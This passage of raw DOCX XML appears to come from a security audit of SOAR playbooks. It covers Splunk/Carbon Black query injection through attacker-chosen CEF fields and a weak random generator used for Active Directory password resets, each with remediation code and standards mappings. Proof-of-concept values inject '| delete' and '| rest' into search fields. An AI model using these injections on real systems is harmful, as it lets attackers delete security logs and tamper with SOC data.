        </w:rPr>
        <w:t>Untrusted-input reachability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: all </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>{0}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> values trace to artifact CEF fields or playbook inputs derived from notables. Verdict: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Conditionally exploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (gated by the search account's capability set; the unquoted </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>dest={0}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> case is the most reliable). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of concept</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (real output):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>PoC 7: Splunk_Notable_Related_Tickets_Search</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>`notable` | search _raw IN (*x*) | delete | append [| rest /services/... ] | search (*)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">(search_term </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>x*) | delete | append [| rest /services/... ] | search (</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t>: quote and escape every interpolated value, or use the Splunk app's parameterised search where possible. Minimal fix — escape embedded quotes/backslashes and always quote:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>def spl_quote(v): return '"' + str(v).replace('\\','\\\\').replace('"','\\"') + '"'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>template = '`notable` | search dest=' + spl_quote(host) + ' | table ...'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Also constrain the Splunk automation account to a least-privilege role that cannot run </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>delete</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>collect</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>outputlookup</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>rest</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>sendemail</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-943 Improper Neutralization of Special Elements in Data Query Logic; CWE-89 SQL Injection (2024 CWE Top 25 #3). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A03:2021 Injection. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1059 Command and Scripting Interpreter, T1565.001 Data Manipulation: Stored Data Manipulation. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SI-10 Information Input Validation, AC-6 Least Privilege. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.PS Protect - Platform Security. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.28 Secure coding. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SOAR playbooks / Input Validation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PB2-07 — Non-cryptographic PRNG used to generate the new Active Directory password</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Medium (CVSS v3.1 base 5.9). Exploitability: Crypto hygiene.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> playbooks/activedirectory_reset_password.py:11-12,38-50</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Code excerpt</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>from random import randint</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>from random import shuffle</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>pwd += alpha[randint(0, len(alpha)-1)]      # :44</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>r = list(pwd); shuffle(r)                    # :48-49</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: The new AD password for a potentially-compromised account is built from Python's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>random</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> module (Mersenne Twister), which is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cryptographically secure and is seeded from predictable state. An attacker who can observe timing / other outputs could narrow the keyspace; more importantly a 20-char string drawn from a fixed pattern (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>alpha, Alpha, digit, special</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> × 5) has far less entropy than it appears. Bandit flags this as B311 at lines 44-47. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Not directly attacker-influenced, but it sets a live credential. Verdict: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Not directly exploitable remotely; defence-in-depth / crypto hygiene issue.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of concept</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Bandit pre-run output: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>activedirectory_reset_password.py:44 B311 … Standard pseudo-random generators are not suitable for security purposes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (lines 44,45,46,47). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>import secrets, string</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>def strong_password(n=20):</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alphabet = string.ascii_letters + string.digits + "!@#$%^&amp;*("</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while True:</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pwd = ''.join(secrets.choice(alphabet) for _ in range(n))</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if (any(c.islower() for c in pwd) and any(c.isupper() for c in pwd)</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and any(c.isdigit() for c in pwd) and any(c in "!@#$%^&amp;*(" for c in pwd)):</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return pwd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>generate_password__strong_password = strong_password()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-338; CWE-330. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A02:2021 Cryptographic Failures. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IA-5 Authenticator Management, SC-13 Cryptographic Protection. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.AA Protect - Identity Management, Authentication, and Access Control. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.24 Use of cryptography. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SOAR playbooks / Cryptographic Practices.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PB2-05 — Raw IP address passed as the whole Splunk/Carbon Black query (hunting.py)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Medium (CVSS v3.1 base 5.8). Exploitability: Conditionally exploitable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> playbooks/hunting.py:303-321</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Code excerpt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>:305-311</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>'query': container_item[0]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> where </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>container_item[0]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>artifact:*.cef.sourceAddress</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>destinationAddress</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: The raw CEF address value is handed to the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>run query</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> action's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>query</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> parameter for Splunk Enterprise / Carbon Black assets with no quoting or validation. On the Splunk asset this becomes attacker-influenced SPL; on Carbon Black it is EDR query-language. Impact is bounded by the search account's role but can enable </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>| delete</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>| outputlookup</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>| sendemail</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, subsearch </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>| rest</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>sourceAddress</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>destinationAddress</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CEF fields are attacker-chosen. Verdict: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Conditionally exploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (depends on whether the Splunk asset account can run generating/transforming commands; ESCU search accounts often can run </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>| delete</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>| collect</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of concept</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (real output):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>PoC 6: hunting.run_query_1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>query param to Splunk/CarbonBlack 'run query': 1.2.3.4" | delete | search "x</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t>: validate addresses before use and never pass a free IP as a full query; build a parameterised search where the value is a quoted field comparison:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>import ipaddress</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>try: ip = str(ipaddress.ip_address(container_item[0]))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>except ValueError: continue</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>parameters.append({'query': 'search (src_ip="{0}" OR dest_ip="{0}")'.format(ip), ...})</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-943 Improper Neutralization of Special Elements in Data Query Logic; CWE-89 SQL Injection (2024 CWE Top 25 #3). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
